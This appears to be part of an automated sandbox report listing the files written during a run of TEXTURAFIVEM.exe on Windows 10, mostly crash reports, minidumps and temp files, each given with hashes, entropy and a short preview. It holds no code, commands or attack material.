                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_TEXTURAFIVEM.exe_7093d9524e5bd5c0215ba39f85fdf23d4de02c1c_8246e0ef_1a16d5fc\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 10874
Entropy (8bit): 3.7750363652092847
Encrypted: false
SSDEEP: 96:364FKy3rTFq0hhq+7MfGpXIQcQvc6QcEDMcw3DSV7VC+HbHg15AJkq+8ls55nj+U:q9oTXHBUZMXojXgkN/u7sMS274Itz7
MD5: 93A6830A63CCDC723774058FC563775F
SHA1: 1637A96E8060791670FF9AFADCA0DECC3F553124
SHA-256: C9948267D54BC2C2296C61AB7690F5D927AED3F57A3DCCD1BF04F5EDFC1B65D4
SHA-512: CEE9BDBE15DFE992ADBBA5E5D44FAAF52D72794AD3F6F673AA308FD9450D07B8B9C9E58C66A2D55E24423810A0CD73606BCAB7A4160E447A0A27BC4833849323
Malicious: false
Reputation: low
                                  Preview (decoded from UTF-16, truncated as in the report):
                                  Version=1
                                  EventType=APPCRASH
                                  EventTime=132630297372779192
                                  ReportType=2
                                  Consent=1
                                  UploadTime=132630297489343699
                                  ReportStatus=268435456
                                  ReportIdentifier=1b7ba365-664e-4cfd-9057-21f0cece881f
                                  IntegratorReportIdentifier=1ca5efc6-4713-473a-8284-d866133fb194
                                  Wow64Host=34404
                                  Wow64Guest=332
                                  NsAppName=TEXTURAFIVEM.exe
                                  AppSessionGuid=00001538-0001-0017-d91b-5f7d8d32d701
                                  TargetAppId=W:0006b0041ed93149c0fe1bdbc90134c0f6a50000ffff!0000273760ea9b8cf2b4e60e48ed7ea96ab92bb3fa1d!TEXTURAFIVEM.exe
                                  Ta
                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_explorer.exe_2e7e35a328c547159bb9cf721d9ab73be4b27e1_3e00274c_16a3140e\Report.wer
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):13758
                                  Entropy (8bit):3.757972856854361
                                  Encrypted:false
                                  SSDEEP:192:yMbCSrMEH9fA1jSLOqRPZKQ/u7sMS274ItH0e:l14M9fA1jx+/u7sMX4ItHb
                                  MD5:C7ACB8D75CC3F2AAE4E5A62BD65CD6A2
                                  SHA1:48AD6602D8FD2EF68EA89095E3D0DD2B5C15A807
                                  SHA-256:048999CD1B3CC12ADC45ECD948799D96792195976277D11CF2752BC39CE72276
                                  SHA-512:805F2ACECC1AC0F2B11D5413C6F275874D7FCCE7CF9CFD9E2C9EDBCF11C8A1A1DC32352BC256F4C8937F5D3D5EE714A174256C96D638A43B979F7DE812EFB60F
                                  Malicious:false
                                  Reputation:low
                                  Preview (decoded from UTF-16, truncated as in the report):
                                  Version=1
                                  EventType=APPCRASH
                                  EventTime=132630297485019014
                                  ReportType=2
                                  Consent=1
                                  UploadTime=132630297657642893
                                  ReportStatus=268435456
                                  ReportIdentifier=e7c89214-f7bb-41d8-aecf-3d53c7f7bf69
                                  IntegratorReportIdentifier=26444c62-cbaf-435b-9ed5-102ee7872839
                                  Wow64Host=34404
                                  Wow64Guest=332
                                  NsAppName=explorer.exe
                                  OriginalFilename=EXPLORER.EXE
                                  AppSessionGuid=000006e8-0001-0017-cee3-d27b8d32d701
                                  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!000061299ccfb2884d5d6d70906b461435a0d0
                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_explorer.exe_2e7e35a328c547159bb9cf721d9ab73be4b27e1_3e00274c_1a9afffa\Report.wer
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):13756
                                  Entropy (8bit):3.7594092204114555
                                  Encrypted:false
                                  SSDEEP:192:pa5gaCSrMwH9fA1jJi7dRPZKQ/u7sMS274ItH0f:pogs4Y9fA1ju5/u7sMX4ItHi
                                  MD5:97769FFB0B86A8B516CDF364DC9B0944
                                  SHA1:27C24B0602304B59F8C7BE6ED7F95D5EF335D954
                                  SHA-256:41CDEBC44AA12037BD65A9445212330F51A2E7D148413BE0AD4288C7C1BE0309
                                  SHA-512:63A632E0690780BF69F98741D3024234CBC4C7ACB03779716F4B32AAD02CA024A537DCDDF119FC6CD2493EF948EA5107226BE8198E76E1387D8F24B17A429561
                                  Malicious:false
                                  Reputation:low
                                  Preview (decoded from UTF-16, truncated as in the report):
                                  Version=1
                                  EventType=APPCRASH
                                  EventTime=132630297423247741
                                  ReportType=2
                                  Consent=1
                                  UploadTime=132630297605143069
                                  ReportStatus=268435456
                                  ReportIdentifier=4529886a-a9f3-450e-aba4-3b228748fcc7
                                  IntegratorReportIdentifier=ba3c1dc5-2b19-43ee-96af-aa5a79d75751
                                  Wow64Host=34404
                                  Wow64Guest=332
                                  NsAppName=explorer.exe
                                  OriginalFilename=EXPLORER.EXE
                                  AppSessionGuid=00001714-0001-0017-ff75-63758d32d701
                                  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!000061299ccfb2884d5d6d70906b461435a0d0
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B9.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4670
                                  Entropy (8bit):4.499298054206131
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8Bj8fm8M4JmIL1ZFPE+q8jLYULZzkd:uITfzZ5SN2Jv1TECpLZzkd
                                  MD5:8D8A054339FE946E1E63CD28D85AA699
                                  SHA1:5E560C39FE31D6EE067F9B3EDA1090222B2F396F
                                  SHA-256:1E6395400D78BD35F564046922303EA6C0B07BC4F368A24D499B40C485C67E8B
                                  SHA-512:FA27F171768B0764883F5F2B0BC7EFCA36869EA00353A045722543277555B776AA7E3091360D6D068E33AC9B95EF9D6617AB7740B503CF29C861943868A6469D
                                  Malicious:false
                                  Preview (line breaks restored, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                                  <req ver="2">
                                   <tlm>
                                    <src>
                                     <desc>
                                      <mach>
                                       <os>
                                        <arg nm="vermaj" val="10" />
                                        <arg nm="vermin" val="0" />
                                        <arg nm="verbld" val="17134" />
                                        <arg nm="vercsdbld" val="1" />
                                        <arg nm="verqfe" val="1" />
                                        <arg nm="csdbld" val="1" />
                                        <arg nm="versp" val="0" />
                                        <arg nm="arch" val="9" />
                                        <arg nm="lcid" val="1033" />
                                        <arg nm="geoid" val="244" />
                                        <arg nm="sku" val="48" />
                                        <arg nm="domain" val="0" />
                                        <arg nm="prodsuite" val="256" />
                                        <arg nm="ntprodtype" val="1" />
                                        <arg nm="platid" val="2" />
                                        <arg nm="tmsi" val="948486" />
                                        <arg nm="osinsty" val="1" />
                                        <arg nm="iever" val="11.1.17134.0-11.0.47" />
                                        <arg nm="portos" val="0" />
                                        <arg nm="ram" val="4096" />
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CFA.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:55:40 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):50640
                                  Entropy (8bit):1.9489459799241413
                                  Encrypted:false
                                  SSDEEP:192:P97621hat82TLj2Hws9oLyZC1yaZu4+DwUwJVG6XyA2r7:Bj1h4L6HpC1sVDwlvyV7
                                  MD5:E12AA0B7403D7F57E43497AFFA6B41CE
                                  SHA1:A4A727AB61BEE1846947B3C4514B88A2ABC69E00
                                  SHA-256:AF28A30E924E58F2921EAD500CD9AEDCBAE99DDDA23114D3E354D67ED1DEBF2E
                                  SHA-512:BE245E6A15328EBFE1D699D27C66D33F2DE826AD1087587B28ACCB82537791AC4A592FB8382A07EDC001650C1CA0458BD5E8E6C0EA48613FF5C715D93CD17EC8
                                  Malicious:false
                                  Preview: MDMP minidump header (binary; recoverable strings: GenuineIntel, Pacific Standard Time, Pacific Daylight Time, 17134.1.x86fre.rs4_release.180410-1804, dbgcore.i386,10.0.17134.1)
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8F2.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8286
                                  Entropy (8bit):3.698875053349122
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNizi6M6Yap6/FoqgmfdSzCprC89by4sfBGm:RrlsNi26M6Yc6/FoqgmfdSwyrfJ
                                  MD5:313EC80C367AAE142942DB59BF47F931
                                  SHA1:6F65923B644BB810C91580A3DECF3D4A9CA32CBF
                                  SHA-256:015E59545925394A9A55287696D5CA360E5BB45BAF6A7787432FF5CAA6171D71
                                  SHA-512:773E52BDF4B646921B3B96F85E365AD7DA0AF39EB3467135A56E79718C296DFE01FA63E275B01D3126F9141686C4156F5FF4ACABBF679BAC6A89DD1F7E89C873
                                  Malicious:false
                                  Preview (decoded from UTF-16, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-16"?>
                                  <WERReportMetadata>
                                    <OSVersionInformation>
                                      <WindowsNTVersion>10.0</WindowsNTVersion>
                                      <Build>17134</Build>
                                      <Product>(0x30): Windows 10 Pro</Product>
                                      <Edition>Professional</Edition>
                                      <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
                                      <Revision>1</Revision>
                                      <Flavor>Multiprocessor Free</Flavor>
                                      <Architecture>X64</Architecture>
                                      <LCID>1033</LCID>
                                    </OSVersionInformation>
                                    <ProcessInformation>
                                      <Pid>5432</Pid>
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC0F.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4576
                                  Entropy (8bit):4.503458124043041
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8B68fm8M4JNRWC9FXM+q82nryBWrfTdTud:uITfzZ5SNFJNRLvMdnmB+fTdTud
                                  MD5:7E0906B6455FF93AA8FE7071284EED90
                                  SHA1:EF26EF6033C825EB9E7872356368B2DB682EFDA0
                                  SHA-256:D40222DCED6EF7269161C197985A23E7FE603DC85DA1C792DCA628603FCD2E95
                                  SHA-512:810461B51028E23ECEC62A9B2F067383E77DE5F8C3F2068CBEAFD8858501302C369F2A0D95F94FC6E0F260138E29B13B994F917BCE26231EB83E6202F362099D
                                  Malicious:false
                                  Preview (line breaks restored, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                                  <req ver="2">
                                   <tlm>
                                    <src>
                                     <desc>
                                      <mach>
                                       <os>
                                        <arg nm="vermaj" val="10" />
                                        <arg nm="vermin" val="0" />
                                        <arg nm="verbld" val="17134" />
                                        <arg nm="vercsdbld" val="1" />
                                        <arg nm="verqfe" val="1" />
                                        <arg nm="csdbld" val="1" />
                                        <arg nm="versp" val="0" />
                                        <arg nm="arch" val="9" />
                                        <arg nm="lcid" val="1033" />
                                        <arg nm="geoid" val="244" />
                                        <arg nm="sku" val="48" />
                                        <arg nm="domain" val="0" />
                                        <arg nm="prodsuite" val="256" />
                                        <arg nm="ntprodtype" val="1" />
                                        <arg nm="platid" val="2" />
                                        <arg nm="tmsi" val="948486" />
                                        <arg nm="osinsty" val="1" />
                                        <arg nm="iever" val="11.1.17134.0-11.0.47" />
                                        <arg nm="portos" val="0" />
                                        <arg nm="ram" val="4096" />
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0B1.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:55:46 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):183936
                                  Entropy (8bit):1.4381852222832645
                                  Encrypted:false
                                  SSDEEP:384:5VrkJu8iX/V6MCT7NFejq3ioJiMrQwlqwpaU:5cTivV6JvTejqSoMGBMU
                                  MD5:ED5B058B983884379AC400C79B5EC396
                                  SHA1:93BC2BDB07928AE43AAE27554BE59D9631A632DF
                                  SHA-256:2ECA9D28DF00E0F1DA52B2456F68395514DCF3AA2177BC47D57DBABA50EBDEA8
                                  SHA-512:3D18E1D329E4BC04D7E343A04433D5C408F71E41D7E3F08D05E423E48626981FFCED9E260333C4D6C280FA3EAB716F2156F3BF150E9DD2FD2AFAAA198831B2F1
                                  Malicious:false
                                  Preview: MDMP minidump header (binary; recoverable strings: GenuineIntel, Pacific Standard Time, Pacific Daylight Time, 17134.1.x86fre.rs4_release.180410-1804, dbgcore.i386,10.0.17134.1)
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC42A.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8294
                                  Entropy (8bit):3.695055426456443
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNip4s6Fii6YiQ56TTgmfqDSRCprX89btQsfovm:RrlsNipb6F6Yn56TTgmfqDSBtjft
                                  MD5:C247481A4419EEF0E719D28607963E95
                                  SHA1:E597609B119403F1399FFE933C483C8F1C3922A4
                                  SHA-256:5C900913985309C8833E03188332946A5E96DB0036469E8AA7574551C65A6F4A
                                  SHA-512:DC20B2B34AD4D8BEE267B76C053A28300B8175687885DBB99BF9B96310A37EDDD48CAB629C446AE76874C29C49685789419B42279486DE60775813D62F250FAC
                                  Malicious:false
                                  Preview (decoded from UTF-16, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-16"?>
                                  <WERReportMetadata>
                                    <OSVersionInformation>
                                      <WindowsNTVersion>10.0</WindowsNTVersion>
                                      <Build>17134</Build>
                                      <Product>(0x30): Windows 10 Pro</Product>
                                      <Edition>Professional</Edition>
                                      <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
                                      <Revision>1</Revision>
                                      <Flavor>Multiprocessor Free</Flavor>
                                      <Architecture>X64</Architecture>
                                      <LCID>1033</LCID>
                                    </OSVersionInformation>
                                    <ProcessInformation>
                                      <Pid>5908</Pid>
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8CD.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:55:54 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):176444
                                  Entropy (8bit):1.4577996275971805
                                  Encrypted:false
                                  SSDEEP:384:JcEVfEklxIpBLrvnOY7i+j0JRA+gOO0E33l39:jfoJvOYfj0fA+EVN
                                  MD5:CCDD29807B72EB7B4D4BE8DD77CC45AC
                                  SHA1:9AB126DBF9648EC66E9ADF863A7CB5C05FBA097F
                                  SHA-256:B8D017964A8BB35F155494DE2143E5801FC47A410DF769D7A7B5A5FA84D6AD98
                                  SHA-512:F4F23FDC06A186B2DB0EDF27557E422590ABD16757A20D2E459B0B20F8B64759B4F7EDB87C0F114AAE3781963288E89E787CF127B80B60B0493BF8CD3D97F18F
                                  Malicious:false
                                  Preview: MDMP minidump header (binary; recoverable strings: GenuineIntel, Pacific Standard Time, Pacific Daylight Time, 17134.1.x86fre.rs4_release.180410-1804, dbgcore.i386,10.0.17134.1)
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB40.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4670
                                  Entropy (8bit):4.4972648076746715
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8Bi8fm8M4JmIL1ZFx+q8jLYU/ZzYd:uITfzZ5SNlJv1NCp/ZzYd
                                  MD5:3FBFB6B48EB99E589BDCAE1F91A4D5B3
                                  SHA1:A03C8E93F385BA9A4C43DA55C53587817BE163B6
                                  SHA-256:B2EB07FEB1B6EA275A609C6B6222FB5F92C639740CA1A72DD5BF513415693669
                                  SHA-512:B39D9F8E3F4E80FFF0AECB2B9629614ED506FA3399A67000F903C9CC426D16D400F487D3E040BCB15AF80C0EAD36139511A06DC76E1A78D540E64CEDC1724755
                                  Malicious:false
                                  Preview (line breaks restored, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                                  <req ver="2">
                                   <tlm>
                                    <src>
                                     <desc>
                                      <mach>
                                       <os>
                                        <arg nm="vermaj" val="10" />
                                        <arg nm="vermin" val="0" />
                                        <arg nm="verbld" val="17134" />
                                        <arg nm="vercsdbld" val="1" />
                                        <arg nm="verqfe" val="1" />
                                        <arg nm="csdbld" val="1" />
                                        <arg nm="versp" val="0" />
                                        <arg nm="arch" val="9" />
                                        <arg nm="lcid" val="1033" />
                                        <arg nm="geoid" val="244" />
                                        <arg nm="sku" val="48" />
                                        <arg nm="domain" val="0" />
                                        <arg nm="prodsuite" val="256" />
                                        <arg nm="ntprodtype" val="1" />
                                        <arg nm="platid" val="2" />
                                        <arg nm="tmsi" val="948486" />
                                        <arg nm="osinsty" val="1" />
                                        <arg nm="iever" val="11.1.17134.0-11.0.47" />
                                        <arg nm="portos" val="0" />
                                        <arg nm="ram" val="4096" />
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE1A.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:56:01 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):185660
                                  Entropy (8bit):1.4356969576165521
                                  Encrypted:false
                                  SSDEEP:384:Ue2xQbBIhlu48/Hyd+782FXnxOrBqOipQmDabnShq:Ue2xcBm4rdwYYrsOipQ7cq
                                  MD5:80913680B490509D6E99672810F0F795
                                  SHA1:541D2D3193BF97B42277227C56241466C9F30F68
                                  SHA-256:3C7381D8B19DAFA4B1F48A34EFF07766EA8B9CEE875CAC489B99B3F77154EB8A
                                  SHA-512:63C76C33D65C882C22DC450F82FC4507F212B96F228DC8FDC6B571E7DE29500BA6A5C2B3D2A52F6C27B4EC7D939A78824791FD052DD4270F9DF5D607E06583E8
                                  Malicious:false
                                  Preview: MDMP minidump header (binary; recoverable strings: GenuineIntel, Pacific Standard Time, Pacific Daylight Time, 17134.1.x86fre.rs4_release.180410-1804, dbgcore.i386,10.0.17134.1)
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE399.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8290
                                  Entropy (8bit):3.696347378705349
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiaE6Q6YCv69gmfqDSRCprf89bMMRgsfwkm:RrlsNih6Q6YC69gmfqDSJMMRzfi
                                  MD5:FC27787BB04EEB64519B0C5A6D08711C
                                  SHA1:06361E93673221EDF0644B1849A7A52B1737BCE8
                                  SHA-256:CF431E9010D7C89339BDF3EC2CE524A64B4197D5ADA326937C0B1ADD4918A298
                                  SHA-512:1D19BA64A144DE1817632B12A420420C5862E65658D8C4B4857438FB76105AD1054E33829700DCD03B2FA4B0130394C5594D2829549640B36ABC0F2B8D5D4F38
                                  Malicious:false
                                  Preview (decoded from UTF-16, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-16"?>
                                  <WERReportMetadata>
                                    <OSVersionInformation>
                                      <WindowsNTVersion>10.0</WindowsNTVersion>
                                      <Build>17134</Build>
                                      <Product>(0x30): Windows 10 Pro</Product>
                                      <Edition>Professional</Edition>
                                      <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
                                      <Revision>1</Revision>
                                      <Flavor>Multiprocessor Free</Flavor>
                                      <Architecture>X64</Architecture>
                                      <LCID>1033</LCID>
                                    </OSVersionInformation>
                                    <ProcessInformation>
                                      <Pid>1768</Pid>
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2AE.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4670
                                  Entropy (8bit):4.498288007192859
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8BV8fm8M4JmIL1ZFZ2+q8jLYUBjZzDd:uITfzZ5SNsJv1ICpBjZzDd
                                  MD5:1F5C5F73930D1DB2442E8E812F8A0B23
                                  SHA1:7BA858F190A5187B1FEEACAA21A1A81AA39D6226
                                  SHA-256:BA14A67A0447A4215B4FD9E0CEB9E9C02A13D8C26B83F85A8F90F82449FADD43
                                  SHA-512:A387495D61933D008117329E73554C62595FB31638607779E5E35CBF7790F82402C225471E3D42D57FD32E4D662FBAAE50A77B1432F820EEF856768A8BDF80EE
                                  Malicious:false
                                  Preview (line breaks restored, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                                  <req ver="2">
                                   <tlm>
                                    <src>
                                     <desc>
                                      <mach>
                                       <os>
                                        <arg nm="vermaj" val="10" />
                                        <arg nm="vermin" val="0" />
                                        <arg nm="verbld" val="17134" />
                                        <arg nm="vercsdbld" val="1" />
                                        <arg nm="verqfe" val="1" />
                                        <arg nm="csdbld" val="1" />
                                        <arg nm="versp" val="0" />
                                        <arg nm="arch" val="9" />
                                        <arg nm="lcid" val="1033" />
                                        <arg nm="geoid" val="244" />
                                        <arg nm="sku" val="48" />
                                        <arg nm="domain" val="0" />
                                        <arg nm="prodsuite" val="256" />
                                        <arg nm="ntprodtype" val="1" />
                                        <arg nm="platid" val="2" />
                                        <arg nm="tmsi" val="948486" />
                                        <arg nm="osinsty" val="1" />
                                        <arg nm="iever" val="11.1.17134.0-11.0.47" />
                                        <arg nm="portos" val="0" />
                                        <arg nm="ram" val="4096" />
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF10.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8290
                                  Entropy (8bit):3.691967424613124
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNi3d6WGii6YI760gmfqDSRCprx89bXvsflvdm:RrlsNiN6f6Ys60gmfqDS3XUf2
                                  MD5:5E1DE23855DFAD03C1F4C443FC0A00AE
                                  SHA1:315EEE67D006CCC025360DB03308107C1810AB37
                                  SHA-256:1C8B87B3340CF94EF02BABC84CA96253DC95BFC5827F0852E7F91640F374560B
                                  SHA-512:62AA1F6D7408F880D88933B4F0DEE36B7CA2BA42952F3C0300D4319F69E78ED7D6F8114A7DAB553539849DAE2EA166795C087684D8CED8CE0AA5EF47A5791E5B
                                  Malicious:false
                                  Preview (decoded from UTF-16, truncated as in the report):
                                  <?xml version="1.0" encoding="UTF-16"?>
                                  <WERReportMetadata>
                                    <OSVersionInformation>
                                      <WindowsNTVersion>10.0</WindowsNTVersion>
                                      <Build>17134</Build>
                                      <Product>(0x30): Windows 10 Pro</Product>
                                      <Edition>Professional</Edition>
                                      <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
                                      <Revision>1</Revision>
                                      <Flavor>Multiprocessor Free</Flavor>
                                      <Architecture>X64</Architecture>
                                      <LCID>1033</LCID>
                                    </OSVersionInformation>
                                    <ProcessInformation>
                                      <Pid>4908</Pid>
                                  C:\Users\user\AppData\Local\Temp\UuU.uUu
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:ASCII text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):1680
                                  Entropy (8bit):3.1705169676874587
                                  Encrypted:false
                                  SSDEEP:48:81jcy2DvQYcxascyjEdfqQrB0FIbyqCJJ:81jcNCascoEYQWe/C7
                                  MD5:1BD90647356DABD3C913893E6FE53869
                                  SHA1:455ADB06D28ADE02E02CC4D2A996045457AEF406
                                  SHA-256:361555CEE16A1B83B44AB187CA98672F85FC03758A89BAA4F23DB34E3A9439E7
                                  SHA-512:35CCCA5C0DA665E90D3A6B7DC90A891562C1D3228D02B486CF04CA4A10755AD4DCBB2EB9BF438A05B1FF16EFFE5D575C8565A70ADF159CE23B939A0D9A5C2700
                                  Malicious:false
                                  Preview: 23:55:3023:55:3021:55:4022:25:5022:56:0023:56:1000:26:2001:26:3001:56:4002:26:5003:27:0003:57:1004:57:1905:57:3006:27:4007:27:4907:28:0007:58:1008:58:2009:28:3010:28:4010:58:5011:29:0011:59:1012:59:2013:29:3013:59:4014:59:5015:30:0016:00:0917:00:1917:30:2918:00:3919:00:4919:30:5920:01:0920:31:1921:31:2922:01:3922:31:4900:01:5800:32:0801:02:1802:02:2803:02:3803:32:4804:02:5805:03:0805:33:1806:03:2807:03:3807:33:4808:33:5709:04:0709:34:1710:34:2711:04:3711:34:4712:34:5713:05:0713:35:1714:35:2715:05:3715:35:4716:35:5717:06:0617:36:1618:36:2619:06:3619:36:4620:36:5621:07:0621:37:1622:07:2623:07:3623:37:4600:07:5601:08:0601:38:1502:08:2503:08:3503:38:4504:08:5504:39:0505:39:2505:39:2506:09:3507:09:4507:39:5508:10:0509:10:1509:40:2510:10:3511:10:4411:40:5412:11:0412:41:1413:41:2414:11:3414:41:4415:11:5416:12:0416:42:1417:12:2418:12:3418:42:4419:12:5320:13:0320:43:1321:13:2322:13:3322:43:4323:13:5323:44:0300:44:1301:14:2301:44:3302:44:4303:14:5203:45:0204:45:1205:15:2205:45:3206:45:4207:15:52
                                  C:\Users\user\AppData\Local\Temp\XX--XX--XX.txt
                                  Process:C:\Windows\install\TEXTURAFIVEM.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):235454
                                  Entropy (8bit):7.963205302258584
                                  Encrypted:false
                                  SSDEEP:3072:ofP5JuXLFG3Oa95BrKUqEQ94jhc3PQuPe2D2ue3NXR0jW/UCFnp7HBIJJyCwFiCT:G5JGmrpQsK3RD2u270jupCJsCxCT
                                  MD5:ABCC5291A7C838FD21888B5206CBBF76
                                  SHA1:B38468DC48FE3A6B6658411BD7F3DEF8A137D688
                                  SHA-256:CDC5568BD80A548282E7E920137770594E5CC915CFC251EFD69BF850D78C7754
                                  SHA-512:6FEFEAAFB90AACD05BDC80BE08EDF8FC865655EB091FA51C217389CFD6A1ED21CCDFC0A3712E7B516F1F1E2DB32908FE70F3A80DEEAE4CA1AEA9C86DA0D5ADA4
                                  Malicious:false
                                  Preview: C:\Windows\install\TEXTURAFIVEM.exe|C:\Windows\install\TEXTURAFIVEM.exe|.................####@####.................####@####.................####@####.................####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@####.Q....####@####...####@####....####@####.####@####..............####@####.......####@####...............####@####...................................####@####....####@####....####@####....####@####..####@####.####@####............####@####................................####@####....####@####....####@####.....####@####............####@####......####@#### ####@####........####@####.&Kj..b####@####..####@####..####@####....####@####.....####@####.....####@####.....####@####....####@####....####@####....####@####....####@####....####@####....####@####....####@####....####@####.####@####...........####@####.....####@####.....####@####...
                                  C:\Users\user\AppData\Local\Temp\XxX.xXx
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:ASCII text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):2736
                                  Entropy (8bit):3.0918318109389906
                                  Encrypted:false
                                  SSDEEP:48:8VHHHJ//yLLHB6AfAfPPPTcccmyItHkYcxQ91qyj+XKQWBEFIbyys9JJ:8VHHHJ//rAfAfPPPHZPCQ91qoEKQ7efq
                                  MD5:A7205743BD5087466B60236F16FB2097
                                  SHA1:2F5B76BED2309829DC3504CDF76A067A85DC2760
                                  SHA-256:D14D6ECB8E92A45D4836BFF504F98CAB64598160BB0B8226B8C5BA1C68C0A803
                                  SHA-512:520FF48DE8B657399278C28AA7B28D7A7159DFFF33A554045C3A5739303E0A590B8DA3C342F1B92D3E76918A54E45E39F2C0CFD1D5BE4DEA353DE6CCD3B6A19C
                                  Malicious:false
